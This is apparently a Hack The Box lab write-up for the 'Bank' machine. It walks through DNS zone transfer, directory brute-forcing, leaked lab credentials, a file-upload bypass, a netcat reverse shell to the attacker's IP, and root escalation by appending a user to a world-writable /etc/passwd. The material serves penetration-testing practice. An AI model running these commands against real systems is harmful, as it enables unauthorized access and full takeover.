Summary

Bank is an easy Linux box. It can be exploited by enumerating DNS and finding a new subdomain. This forwards to a login page. This domain was brute-forced for directories and it contained a directory with a large amount of sensitive files containing encrypted emails and passwords. One of the files contained plaintext credentials which was found with grep. After obtaining credentials you will have access to a support page where you can create a ticket and bypass the file upload restrictions. Sudo privileges were obtained by writing a new user to the passwd file which had world-write permissions enabled.


Discovery

Started off by running NmapAutomator.
Nmap discovered the following open ports and services:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Subdomain Discovery

The interesting port is 53. DNS can be enumerated by performing a zone transfer, for this to work you first have to guess the domain, as you probably guessed, this is bank.htb:

jeroen@kali:~/htb/bank$ dig axfr bank.htb @10.129.29.200 

;  DiG 9.16.11-Debian axfr bank.htb @10.129.29.200
;; global options: +cmd
bank.htb.		604800	IN	SOA	bank.htb. chris.bank.htb. 6 604800 86400 2419200 604800
bank.htb.		604800	IN	NS	ns.bank.htb.
bank.htb.		604800	IN	A	10.129.29.200
ns.bank.htb.		604800	IN	A	10.129.29.200
www.bank.htb.		604800	IN	CNAME	bank.htb.
bank.htb.		604800	IN	SOA	bank.htb. chris.bank.htb. 6 604800 86400 2419200 604800
;; Query time: 12 msec
;; SERVER: 10.129.29.200#53(10.129.29.200)
;; WHEN: Mon Feb 22 15:25:02 CET 2021
;; XFR size: 6 records (messages 1, bytes 171)

In the output, several new domains were discovered. You can also scan for subdomains with WFUZZ:

wfuzz -u http://10.10.10.29/ -H "Host: FUZZ.bank.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hh 11510

However, no subdomains were found. Navigating to bank.htb lead to the discovery of a login page. This was not vulnerable to SQL Injection so I bruteforced this domain (dir-dir = gobuster with directory-list-2.3-medium.txt:

dir-dir -u http://bank.htb/ -o login-dir-dir --wildcard -x php

It found the following directories:

http://bank.htb/login.php (Status: 200)
http://bank.htb/uploads (Status: 301)
http://bank.htb/support.php (Status: 302)
http://bank.htb/assets (Status: 301)
http://bank.htb/index.php (Status: 302)
http://bank.htb/logout.php (Status: 302)
http://bank.htb/inc (Status: 301)
http://bank.htb/server-status (Status: 403)
http://bank.htb/balance-transfer (Status: 301)

The directory balance-transfer is of interest. It contains a lot of files:

The files look as follows:

++OK ENCRYPT SUCCESS
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: WSO99GxdMW3WYxJwPIEqJHyt5UEAxnKtfyDpfaC16GY5dIB3rgtaY1E3WjDtGnWWWAlcKYdREbWSUxVlNpvLraPnttQaRN6Onr08pdZ4pWWjuREhha3IlT5OmVYdJ416
Email: w1fWfe1EbXYFPDX6N1O8UTXhPWuz1wGxyVuNavsltq0i3YpRZe0T8YaXUFxVcdtK8Xyit0EWrFfuDFmCTmw1kGYfmwayJDjRBRa5SP2juhO7WaJPxfRSWQ7jmhS5VbXw
Password: 38CVXEerW3zSdjILzzDvpKPL1HRXTOuXW6TUK8mGbVzoei9NSNjhx83zQVwKJ1IG7BBSJXzUS8j7qtUjgeAOnEnezUZjVH03iBV1zuWsDfz4IunZIYN6Cakc5jw00w3i
CreditCards: 0
Transactions: 149
Balance: 3301234 .
===UserAccount===

Notice the top line, these were encoded with MD5 after which you will get a valid hash. However, John was unable to crack this.

Credential Discovery

At this point I was stuck for a while but noticed one of the files being different. In this cases you always want to look for unique files. As illustrated in the picture, all of them had a size of 58x so let’s filter for that:

curl http://bank.htb/balance-transfer/ | grep -v "58"

This will curl all the files and exclude the lines that contain 58 (the file size of most files). You are left with one file, let’s curl that:

curl http://bank.htb/balance-transfer/68576f20e9732f1b2edc4df5b8533230.acc -o odd.txt

This contained plaintext credentials:

--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===

You can login with these credentials. This will provide you this dashboard:

Theres a subsection with support:

This has a file upload opportunity. Here I was stuck for a bit as well. It filtered for images and running exiftool like but this was not successful. Turns out that theres a comment on the page:

[DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG]

So, you can simply send a webshell or reverse shell, I tend to go for webshells to verify if it works first. Make sure you change the file extension to .htb.

Lets use this cool tool to generate some reverse shells and find out which ones work. The netcat one worked:

nc -e /bin/sh 10.10.14.147 4444

Privilege Escalation

I always run linpeas first.

Method 1: Writeable passwd

Linpeas found that the passwd file is world-writeable. This is really bad and really easy to exploit. First, generate a password:

openssl passwd banaan
	0Vi8hrkOsZt2g

Then add a new user entry to passwd as root:

echo "banaan:0Vi8hrkOsZt2g:0:0:root:/root:/bin/bash" >> /etc/passwd

Now you can obtain a root shell with:

su banaan

root@bank:/tmp# whoami && id
root
uid=0(root) gid=0(root) groups=0(root)

Method 2: SUID

Linpeas also found this odd SUID file:

/var/htb/bin/emergency

When you run this you will get a root shell:

root@bank:~# /var/htb/bin/emergency
# id
uid=0(root) gid=0(root) groups=0(root)

Conclusion

This was a really fun box, really enjoyed it. I like the bit of practice with bypassing the file upload extensions. Hope you learned something and enjoyed this writeup!